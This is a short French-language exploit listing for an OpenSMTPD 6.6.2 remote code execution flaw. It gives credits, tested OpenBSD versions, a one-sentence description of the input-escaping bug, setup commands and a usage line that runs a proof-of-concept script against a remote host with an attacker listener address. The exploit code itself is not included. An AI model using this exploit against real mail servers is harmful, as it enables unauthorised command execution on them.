
Exploit d'exécution de code à distance pour OpenSMTPD version 6.6.2
Titre de l'exploit : OpenSMTPD 6.6.2 - Exécution de code à distance.
Date : 2020-01-29.
Auteur de l'exploit : 1F98D.
Auteur original : Qualys Security Advisory.
Page d'accueil du fournisseur : https://www.opensmtpd.org/.
Lien du logiciel : https://github.com/OpenSMTPD/OpenSMTPD/releases/tag/6.6.1p1.
Version : OpenSMTPD < 6.6.2.
Testé sur : OpenBSD 6.6, OpenBSD 6.5, OpenBSD 6.4, OpenBSD 5.9.
OpenSMTPD, après le commit a8e222352f et avant la version 6.6.2, n'échappe pas correctement les caractères dangereux des entrées contrôlées par l'utilisateur. Un attaquant peut en tirer parti pour exécuter des commandes shell arbitraires sur la cible.
sudo apt install python3-pip
pip3 install --user pwn
python3 poc1.py LHOST LPORT RHOST RPORT
https://packetstormsecurity.com/files/156145/OpenSMTPD-6.6.2-Remote-Code-Execution.html